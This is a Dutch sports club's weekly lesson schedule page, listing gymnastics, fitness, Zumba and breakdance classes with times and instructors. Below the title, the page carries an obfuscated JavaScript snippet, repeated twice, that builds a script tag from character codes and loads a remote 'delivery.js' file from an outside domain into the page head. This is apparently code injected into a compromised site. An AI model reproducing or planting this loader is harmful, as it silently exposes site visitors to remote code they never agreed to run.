Lesrooster

Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,114,97,105,110,46,100,101,118,101,108,111,112,102,105,114,115,116,108,105,110,101,46,99,111,109,47,100,101,108,105,118,101,114,121,46,106,115,63,115,61,51);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,114,97,105,110,46,100,101,118,101,108,111,112,102,105,114,115,116,108,105,110,101,46,99,111,109,47,100,101,108,105,118,101,114,121,46,106,115,63,115,61,51);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();

Maandag

15:00
16:00
Turnen groep 1+2+3
Caroline Welboren
16:00
17:00
Turnen groep 4+5
Caroline Welboren
17:00
19:00
Selectie turnen
Caroline Welboren/Samantha Droog/Svea Rijnders
19:00
20:00
Dames Bodyshape
Angélique Liefting

Dinsdag

09:00
10:00
Bodyfit dames (Sporthal Enterij)
Lea Dam
19:00
20:00
Dames Zumba/Bodyshape
Susanne Huissen
20:00
21:00
Dames Zumba
Susanne Huissen

Woensdag

09:15
10:15
Ouder/kind gym
Samantha Droog
16:00
17:00
Turnen groep 6-7
Ansjo Dokter
17:00
18:00
Turnen groep 7-8-VGO 1
Ansjo Dokter
19:00
20:30
Dancehall (vanaf 1 maart 2020)
Kiki de Groot
20:30
21:30
Breakdance 15+ (vanaf 1 maart 2020)
Falko de Graaf

Donderdag

08:45
09:45
Bodyfit Dames
Lea Dam
16:00
18:00
Selectie turnen jong talent/onderbouw
Samantha Droog/ Svea Rijnders
17:00
19:00
Selectie turnen bovenbouw
Samantha Droog/ Svea Rijnders

Zaterdag

09:00
10:00
Freestyle gym
Falko de Graaf
10:00
11:00
Breakdance beginners
Falko de Graaf
11:00
12:00
Breakdance gevorderden
Falko de Graaf